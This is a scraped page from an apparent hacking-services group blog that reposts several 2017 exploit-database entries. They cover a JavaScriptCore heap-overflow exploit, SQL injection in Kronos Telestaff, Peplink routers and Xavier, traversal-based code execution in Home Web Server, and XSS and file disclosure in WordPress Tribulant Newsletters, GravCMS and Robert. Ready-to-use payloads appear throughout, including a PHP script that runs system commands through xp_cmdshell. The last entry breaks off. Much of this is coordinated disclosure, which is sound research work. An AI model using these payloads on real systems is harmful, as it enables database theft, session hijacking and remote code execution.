Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863138688

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Sources:
https://phoenhex.re/2017-06-02/arrayspread
https://github.com/phoenhex/files/blob/master/exploits/spread-overflow

JavaScriptCore will allocate a JSFixedArray for every spread operand of the array literal (in slow_path_spread). As such, roughly 4 billion JSValues will have to be allocated, taking up 32 GiB in RAM. Luckily, this isn’t much of a problem due to the page compression performed by the macOS kernel. It will, however, take roughly a minute to trigger the bug.

What is left to do now is to perform some heap feng-shui to place something interesting on the heap that we will then overflow into. We use the following heap spray to exploit the bug:

- Allocate 100 JSArrays of size 0x40000 and root them (i.e. keep references). This will trigger GC multiple times and fill up holes in the heap.
- Allocate 100 JSArrays of size 0x40000, where only every second one is rooted. This triggers GC and leaves holes of size 0x40000 in the heap.
- Allocate a larger JSArray and an ArrayBuffer of the same size. These end up directly after the spray from step 2.
- Allocate 4 GiB of padding using JSArrays.
- Trigger the bug by concatenating JSArrays with a combined size of 232 + 0x40000 (containing the repeated byte 0x41).

The target buffer will be allocated in the sprayed region from step 2 and the victim buffers from step 3 will be overwritten. This increases the size of the victim array to the sprayed value (0x4141414141414141), so that it overlaps with the victim ArrayBuffer. The final steps immediately yield the fakeobj and addrof primitives described in section 1.2 of the JavaScriptCore phrack paper which can then be used to write code to a JIT page and jump to it.

In our exploit we perform step 5 in a separate web worker, so that we can launch a second stage shellcode immediately after the victim arrays are overwritten. This way we do not need to wait for the full overwrite to finish, and the heap is only left in a broken state for a very short time, so that garbage collection does not crash (which runs concurrently starting from Safari version 10.1). 


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42125.zip
HireHackking 
Software: Kronos Telestaff Web Application
Version: < 2.92EU29
Homepage: http://www.kronos.com/
CERT VU: VU#958480
CVE: (Pending)
CVSS: 10 (Low; AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-89   
Vulnerable Component: Login page 

Description
================
The login form is vulnerable to blind SQL injection by an unauthenticated user.


Vulnerabilities
================
The vulnerability is due to the unsanitized POST parameter 'user' in login page:
URL: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POSTDATA=device=stdbrowser&action=doLogin&user=&pwd=&code=

The exploit requires a valid "code" in the post body.  However in almost all instances we found on the internet, the "code" POST variable was hard-coded into the page.  Furthermore, the "code" POST variable is very often a 4 digit number - and can be easily discovered in ~5000 requests. 

 
Proof of concept
================
PoC 1 - extract data from database
example extract benign data e.g. 
Injection Point:  [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POST data: 
device=stdbrowser&action=doLogin&user=')if(DB_NAME()='TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>

compare timing with

device=stdbrowser&action=doLogin&user=')if(DB_NAME()<>'TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>


PoC 2 - Execute Code Remotely
example inject benign code e.g. ping a remote systems

<?php
	$cmd_to_execute = strToHex("ping -n 1 receive_ping_host");  // insert you own host here to detect dns lookup and/or ping; or insert other command 
	$code=XXXX // insert valid code
	$target_url= // insert login page url of target system i.e. example.com/webstaff-2.0/servlet/ServletController.asp?device=stdbrowser&action=doLogin&selfhosted=true
	$payload="DECLARE @lphda VARCHAR(280);SET @lphda=".$cmd_to_execute.";EXEC master..xp_cmdshell @lphda";
	$payload=str_replace(" ","%20",$payload);
	$postdata="device=stdbrowser&action=doLogin&user=')".$payload."---&pwd=test&code=".$code;

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $target_url);
	curl_setopt($ch, CURLOPT_POST, TRUE);
	curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
	curl_exec($ch);

	function strToHex($string){
	  $hex = '';
	  for ($i=0; $i<strlen($string); $i++){
		$ord = ord($string[$i]);
		$hexCode = dechex($ord);
		$hex .= substr('0'.$hexCode, -2);
	  }
	  return "0x".strToUpper($hex);
	}

	
Affected Systems
================
From Vendor:
Customers running TeleStaff version 2.x with Self Hosted Web Access, those customers who host their own web access, are affected and Kronos recommends that you upgrade to TeleStaff 2.92EU29 or Workforce TeleStaff.


Solution
================
From Vendor:

Though there is no further action needed after the installation of the update there are a couple of best practices that we suggest to further secure the production environment.
	1. We recommend that the Web Staff Middle Tier be locked down to only be accessed from the source addresses.  For Self-Hosted Web Access this would be the Internet facing IIS server hosting the Self Hosted WebStaff module. For customers using WebStaff (www.telestaff.net) and PSM (psm.telestaff.net and m.telestaff.net) those are the IP addresses of the Kronos servers.
	2. Customers, once configured, should remove the viewDatabases.asp script to avoid accidental information leakage to unauthorized users.

	
Timeline
================
2015-12-18: Discovered
2016-01-04: Contacted Vendor
2016-01-11: Report sent to vendor 
2016-01-20: Received acknowledgement of vulnerable from security contact info at vendor
2016-01-20: Vendor is remediating the issue 
2016-10-18: Vendor issues patch
2017-06-01: Public disclosure
 

Discovered by
================
Chris Anastasio 0x616e6173746173696f [ at ] illumant.com
Mark F. Snodgrass  0x736e6f646772617373 [ at ] illumant.com


About Illumant
================
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks.  Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant.  For more information, visit https://illumant.com/
HireHackking 
# Exploit Title: Home Web Server 1.9.1 build 164 - CGI Remote Code Execution
# Date: 26/05/2017
# Exploit Author: Guillaume Kaddouch
#   Twitter: @gkweb76
#   Blog: https://networkfilter.blogspot.com
#   GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://downstairs.dnsalias.net/ (does not exist anymore)
# Software Link: http://download.cnet.com/Home-Web-Server/3000-2648_4-10652679.html
# Version: 1.9.1 (build 164)
# Tested on: Windows 7 SP1 Family x64 (FR)
# Category: Webapps

"""
Disclosure Timeline:
--------------------
2017-05-26: Vulnerability discovered
2017-05-26: Vendor website is down, no way to contact him

 
Description :
-------------
Home Web Server allows to call cgi programs via POST which are located into /cgi-bin folder. However by using a directory traversal,
it is possible to run any executable being on the remote host.
 

Instructions:
-------------
- Starts Home Web Server.
- Run this exploit from a remote Kali machine with netcat as below.
"""

# Connect with netcat, then drop a single POST to call the executable you want
guillaume@kali:~/kiwi_syslog$ nc 10.0.0.100 80
POST /cgi-bin/../../../../../../../../Windows/system32/calc.exe HTTP/1.1

# Returned response
HTTP/1.1 400 Bad Request
Connection: close
Content-Length: 0
Server: My Web Server (HWS164)

"""
[CTRL+C] : this is important to launch the executable we requested

Calc.exe has been launched on the remote host.
"""
HireHackking 
DefenseCode WebScanner DAST Advisory
WordPress Tribulant Newsletters Plugin
 Multiple Security Vulnerabilities


Advisory ID:            DC-2017-01-012
Advisory Title:         WordPress Tribulant Newsletters Plugin
Multiple Vulnerabilities
Advisory URL:           http://www.defensecode.com/advisories.php
Software:               WordPress Tribulant Newsletters Plugin
Language:               PHP
Version:                4.6.4.2 and below
Vendor Status:          Vendor contacted, update released
Release Date:           2017/05/29
Risk:                   Medium



1. General Overview
===================
During the security audit of Tribulant Newsletters plugin for
WordPress CMS, multiple vulnerabilities were discovered using
DefenseCode WebScanner application security analysis platform.

More information about WebScanner is available at URL:
http://www.defensecode.com


2. Software Overview
====================
According to the authors, WordPress Tribulant Newsletters plugin is a
full-featured newsletter plugin for WordPress which fulfils all
subscribers, emails, marketing and newsletter related needs for both
personal and business environments.

According to wordpress.org, it has more than 9,000 active installs.

Homepage:
https://wordpress.org/plugins/newsletters-lite/
http://tribulant.com/plugins/view/1/wordpress-newsletter-plugin


3. Vulnerability Description
==================================
During the security analysis, WebScanner discovered File Disclosure
vulnerability and multiple Cross Site Scripting vulnerabilities in
Tribulant Newsletters plugin.

3.1 File Disclosure
----
Input:          $_GET['file']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlmethod=exportdownload&file=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWINDOWS%5cwin.ini

3.2 Cross-Site Scripting
----
Input:          $_GET['method']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=check-expired%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

3.3 Cross-Site Scripting
----
Input:          $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Note: Subscriber id (parameter "id") must exist. Value 1 is a good guess for start 

3.4 Cross-Site Scripting
----
Input:          $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-lists&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

3.5 Cross-Site Scripting
----
Input:          $_GET['value']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin-ajax.php?action=newsletters_gauge&value=1});alert(1);</script>

3.6 Cross-Site Scripting
----
Input:          $_GET['order']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&orderby=theme_id&order=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

3.7 Cross-Site Scripting
----
Input:          $_GET['wpmlsearchterm']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlsearchterm=x%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

3.8 Cross-Site Scripting
----
Input:          $_GET['wpmlmessage']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&wpmlupdated=true&wpmlmessage=%3Cscript%3Ealert%281%29%3C%2Fscript%3E


4. Solution
===========
Vendor resolved the security issues after we reported the
vulnerabilities. All users are strongly advised to update WordPress
Tribulant Newsletters plugin to the latest available version.


5. Credits
==========
Discovered with DefenseCode WebScanner security analyzer
by Neven Biruski.


6. Disclosure Timeline
======================
2017/04/04      Vendor contacted
2017/04/06      Vendor responded, update released
2017/05/29      Advisory released to the public


7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security
vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security
Testing, WhiteBox Testing) solution for performing extensive security
audits of application source code. ThunderScan SAST performs fast and
accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security
Testing, BlackBox Testing) solution for comprehensive security audits
of active web applications. WebScanner will test a website's security
by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.

Subscribe for free software trial on our website
http://www.defensecode.com/ .

E-mail: defensecode[at]defensecode.com

Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
HireHackking 
X41 D-Sec GmbH Security Advisory: X41-2017-005

Multiple Vulnerabilities in peplink balance routers
===================================================

Overview
--------
Confirmed Affected Versions: 7.0.0-build1904
Confirmed Patched Versions:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin
Vulnerable Firmware:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin
Models: Balance Routers 305, 380, 580, 710, 1350, 2500
Vendor: Peplink
Vendor URL: https://www.peplink.com/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Additional Credits: Claus Overbeck (Abovo IT)
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/


Summary and Impact
------------------
Several issues have been identified, which allow attackers to access the
administrative web interface with admin credentials, delete files,
perform CSRF and XSS attacks.


Product Description
-------------------
From the vendor webpage:
Use Load Balancing and SpeedFusion bandwidth bonding to deliver
superfast VoIP, video streaming, and data using an SD-WAN enabled
network. Even with a basic Balance 20 dual-WAN router, you can mix
different transport technologies and providers to keep your network up
when individual links go down. Switching between links is automatic and
seamless.



SQL Injection via bauth Cookie
==============================
Severity Rating: Critical
Vector: Network
CVE: CVE-2017-8835
CWE: 89
CVSS Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary and Impact
------------------
Peplink devices are vulnerable to an SQL injection attack via the bauth
cookie parameter which is set e.g. when accessing
https://ip/cgi-bin/MANGA/admin.cgi.

The injection can be checked with the following command:

./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi"
--cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647"
-p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ
--flush-session -t trace.log --prefix "'" --suffix "--" -a

The vulnerability in the Peplink device allows to access the SQLite
session database containing user and session variables. By using the the
following cookie in a web request, it is possible to select a running
administrator session to be used for the attackers login.

bauth=-12' or id IN (select s.id from sessions as s left join
sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')
or '1'='2

By forming specialised SQL queries, it is possible to retrieve usernames
from the database. This worked by returning a valid session in case the
username existed and no session if it did not exist. In the first case
the server did not set a new session cookie in the response to the request.

SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id
from sessions as s left join sessionsvariables as v on v.id=s.id where
v.name='username' and substr(v.value,1,3)='adm')



Workarounds
-----------
Install vendor supplied update.


No CSRF Protection
==================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8836
CWE: 352
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
------------------
The CGI scripts in the administrative interface are not protected
against cross site request forgery attacks. This allows an attacker to
execute commands, if a logged in user visits a malicious website. This
can for example be used to change the credentials of the administrative
webinterface.


Workarounds
-----------
Install vendor supplied update.




Passwords stored in Cleartext
=============================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8837
CWE: 256
CVSS Score: 4.0
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary and Impact
------------------
The Peplink devices store passwords in cleartext in the files
/etc/waipass and /etc/roapass. In case one of these devices is
compromised the attacker can gain access to the cleartext passwords and
abuse them to compromise further systems.


Workarounds
-----------
Install vendor supplied update.




XSS via syncid Parameter
========================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8838
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
------------------
If the webinterface is accessible, it is possible to abuse the syncid
parameter to trigger a cross-site-scripting issue by calling
https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E

This executes the JavaScript in the victims browser, which can be abused
to steal session cookies.

Workarounds
-----------
Install vendor supplied update.




XSS via preview.cgi
===================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8839
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
------------------
If the webinterface is accessible, it is possible to abuse the the
orig_url parameter to trigger a cross-site-scripting issue in
/guest/preview.cgi. The injection is directly into existing JavaScript.

This executes the JavaScript in the victims browser, which can be abused
to steal session cookies.

Workarounds
-----------
Install vendor supplied update.



File Deletion
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8841
CWE: 73
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Summary and Impact
------------------
A logged in user can delete arbitrary files on the Peplink devices, by
abusing the /cgi-bin/MANGA/firmware_process.cgi. When an absolute path
is provided to the upfile.path parameter the file provided in the path
is deleted during the process. This can be abused to cause a denial of
service (DoS). In combination with the missing CSRF protection, this can
be abused remotely via a logged in user.

Workarounds
-----------
Install vendor supplied update.




Information Disclosure
======================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8840
CWE: 200
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary and Impact
------------------
If the webinterface is accessible, it is possible to retrieve sensitive
information without a valid login by opening
cgi-bin/HASync/hasync.cgi?debug=1

This displays the following:

-----8<------------------------------------------------
Master LAN Address    = [ <internal ip> / <netmask> ]
Serial Number         = [ <serial number> ]
HA Group ID           = [ <group id> ]
Virtual IP            = [ <internal ip> / <netmask> ]
Submitted syncid      = [ <syncid> ]
-----8<------------------------------------------------

This information can be valuable for an attacker to exploit other issues.

Workarounds
-----------
Install vendor supplied update.




About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.

Timeline
--------
2017-04-07	Issue found
2017-04-10	Vendor asked for security contact
2017-04-11	Vendor replied, send GPG key
2017-04-11	Information supplied to vendor
2017-04-11	Vendor acknowledges that the information is received
2017-04-17	Vendor acknowledges SQL injection
2017-05-08	CVE IDs for all issues requested
2017-05-08	CVE IDs assigned
2017-05-11	Vendor informed about CVE IDs
2017-05-29	Version provided to X41 for testing
2017-05-31	First test results send back to the vendor
2017-06-01	Remaining test results send back to the vendor
2017-06-05	Coordinated Firmware and Advisory release
HireHackking 
# Exploit Title: GravCMS Core (Admin Plugin) v1.4.2 - Persistent Cross-Site Scripting
# Date: 2017-06-07
# Exploit Author: Ahsan Tahir
# Vendor Homepage: https://getgrav.org/
# Software Link: https://getgrav.org/download/core/grav-admin/1.2.4
# Version: 1.4.2
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
# Contact: https://twitter.com/AhsanTahirAT

Release Date:
=============
2017-06-07


Product & Service Introduction:
===============================
Grav is built and maintained by a team of dedicated and passionate developers, designers and users. 
As Grav is an open source project we greatly appreciate user contribution and commitment. These are the key folks that make this all possible.


Abstract Advisory Information:
==============================
Ahsan Tahir, an independent vulnerability researcher discovered a Persistent Cross-Site Scripting Vulnerability in GravCMS Admin Plugin (v 1.4.2)


Vulnerability Disclosure Timeline:
==================================
2017-06-07: Found the vulnerability.
2017-06-07: Reported to vendor.
2017-06-07: Published.

Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
The security risk of the xss vulnerability is estimated as medium with a common vulnerability scoring system count of 3.6. 
Exploitation of the persistent xss web vulnerability requires a limited admin user account and only low user interaction. 
Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external 
redirect to malicious sources and persistent manipulation of affected or connected web module context.


Proof of Concept (PoC):
=======================
The persistent input validation vulnerability can be exploited by restricted user accounts with low user interaction.
For security demonstraton or to reproduce the vulnerability follow the provided information and steps below to continue.

Payload (Exploitation): [Click Me](javascript:alert(1))

[+] Manual steps to reproduce ..
1. Login with the admin or editor account in GravCMS
2. Go to edit page option (e.g http://127.0.0.1/cms/grav-admin/admin/pages/home)
3. Put the payload "[Click Me](javascript:alert(1))" (without quotes) in the content of page
4. Save Page!
5. Go to the index page (e.g http://127.0.0.1/cms/grav-admin/)
6. Click on "Click Me"
7. The Javascript execution occurs - Successful reproduce of the persistent cross site scripting vulnerability!


Credits & Authors:
==================
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]
HireHackking

Xavier 2.4 - SQL Injection 

Document Title:
===============
Xavier v2.4 PHP MP - SQL Injection Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2076


Release Date:
=============
2017-06-06


Vulnerability Laboratory ID (VL-ID):
====================================
2076


Common Vulnerability Scoring System:
====================================
5.3


Vulnerability Class:
====================
SQL Injection


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
The script can easily be dropped in to an existing website allowing you to protect pages by adding one line of PHP code at the top of a page. 
You can also protect sections of pages. Secure your web pages or sections of content dependant on whether your users are logged in or out, 
or whether they are a member of a User Group. Or secure your pages dependent on whether you are logged on as an administrator.

(Copy of the Homepage:  https://codecanyon.net/item/xavier-php-login-script-user-management/9146226 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple sql-injection web vulnerabilities in the Xavier PHP Login Script & User Management Admin Panel v2.4 web-application.


Vulnerability Disclosure Timeline:
==================================
2017-06-06: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Siggles
Product: Xavier - PHP Login Script & User Management Admin Panel 2.4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple sql-injection vulnerabilities has been discovered in the Xavier PHP Login Script & User Management Admin Panel web-application.
The issue allows remote attackers to inject own malicious sql commands to compromise the web-application & database management system.

The sql-injection vulnerabilities are located in the `usertoedit` and `log_id` parameters of the `adminuserdit.php` and `editgroup.php` files.
Remote attackers with privileged user accounts are able to compromise the web-application and database management system by injection of sql 
commands via GET method request. The attacker vector is client-side and the request method to inject the sql commands is GET. The vulnerability 
is a classic order by sql-injection.

The security risk of the sql-injection web vulnerability is estimated as medium with a common vulnerability scoring system count of 5.3. 
Exploitation of the remote sql-injection web vulnerability requires an authenticated web-application user account and no user interaction. 
Successful exploitation of the sql-injection web vulnerability results in web-application or database management system compromise.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] adminuseredit.php
[+] editgroup.php

Vulnerable Parameter(s):
[+] usertoedit
[+] log_id


Proof of Concept (PoC):
=======================
The remote sql-injection vulnerability can be exploited by authenticated user accounts without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


PoC: Example
https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=[SQL-INJECTION VULNERABILITY!]
https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=[SQL-INJECTION VULNERABILITY!]


PoC: Exploitation
https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=1%20order%20by%203--
https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=1%20order%20by%203--


--- SQL Error & Exception Logs ---
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42S22]: 
Column not found: 1054 Unknown column '100' in 'order clause'' 
in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:300 Stack trace: 
#0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(300): PDO->query('SELECT * FROM `...') 
#1 /home/angry/public_html/xavier-demo/admin/editgroup.php(11): Functions->returnGroupInfo(Object(Database), '1 order by 100-...') 
#2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 300
-
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: 
Syntax error or access violation: 1064 You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' 
in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:300 Stack trace: 
#0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(300): PDO->query('SELECT * FROM `...') 
#1 /home/angry/public_html/xavier-demo/admin/editgroup.php(11): Functions->returnGroupInfo(Object(Database), ''') 
#2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 300
-
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: 
Syntax error or access violation: 1064 You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1' 
in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:59 Stack trace: 
#0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(59): PDO->query('SELECT username...') 
#1 /home/angry/public_html/xavier-demo/admin/adminuseredit.php(26): Functions->usernameTaken('-1' -1'') 
#2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 59


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=%27[SQL-INJECTION VULNERABILITY!]-- 
Mime Type[text/html]
   Request Header:
      Host[xavier-php.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Cookie[PHPSESSID=6b9f9560a6a0d35b12b8603424cf2525]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Server[Apache]
      Keep-Alive[timeout=2, max=100]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]
      Content-Type[text/html]
-
20:49:05.559[216ms][total 277ms] Status: 200[OK]
GET https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=%27[SQL-INJECTION VULNERABILITY!]-- 
Mime Type[text/html]
   Request Header:
      Host[xavier-php.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Cookie[PHPSESSID=6b9f9560a6a0d35b12b8603424cf2525]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Server[Apache]
      Keep-Alive[timeout=2, max=100]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]
      Content-Type[text/html]


Reference(s):
https://xavier-php.localhost:8080/
https://xavier-php.localhost:8080/xavier/
https://xavier-php.localhost:8080/xavier/admin/
https://xavier-php.localhost:8080/xavier/admin/editgroup.php
https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a parse via escape of the vulnerable parameters in the affected php files.
Restrict the prameter input and use a prepared statement to secure the functions of the admin panel.
Disallow to preview errors in the php code of the panel to prevent attacks.


Security Risk:
==============
The security risk of the sql-injection vulnerability in the web panel of the xavier application is estimated as medium (CVSS 5.3).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
HireHackking 
# Exploit Title: Robert 0.5 - Multiple Vulnerabilities XSS, CSRF, Directory
traversal & SQLi
# Date: 07/06/2017
# Exploit Author: Cyril Vallicari / HTTPCS - ZIWIT
# Vendor website :http://robert.polosson.com/
# Download link : https://github.com/RobertManager/robert/archive/master.zip
# Live demo : http://robertdemo.polosson.com/
# Version: 0.5
# Tested on: Windows 7 x64 SP1 / Kali Linux


Web-application open-source management of equipment park for rental or loan.
Written in HTML, PHP, MySQL, CSS and Javascript.

Description : Multiple security issues have been found :  XSS, CSRF,
Directory Traversal, SQLi


1- XSS reflected

http://192.168.3.215/robert/index.php?go=infos%22%3E%3Cscript%3Ealert(1)%3C/script%3E
param vuln : go
script vuln : index.php

2- XSS reflected

POST /robert/modals/personnel_list_techniciens.php
data :
searchingfor=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&searchingwhat=surnom
param vuln : searchingfor
script vuln : personnel_list_techniciens.php

3- XSS Stored

POST /robert/fct/matos_actions.php
data:
 action=addMatos&label=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&ref="><script>alert(1)</script>&categorie=son&sousCateg=0&Qtotale=1&dateAchat=&tarifLoc=1&valRemp=1&externe=0&ownerExt=&remarque=%22%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E
param vuln : label, ref et remarque
script vuln : matos_actions.php

4- XSS Stored

POST /robert/fct/packs_actions.php
data
:action=addPack&label=%22%3E%3Cscript%3Ealert(5)%3C%2Fscript%3E&ref="><script>alert(4)</script>&categorie=son&detail=undefined&externe=0&remarque=%22%3E%3Cscript%3Ealert(6)%3C%2Fscript%3E&detail={"2":1}
param vuln : label, ref et remarque
script vuln : packs_actions.php

5- XSS stored

POST /robert/fct/beneficiaires_actions.php
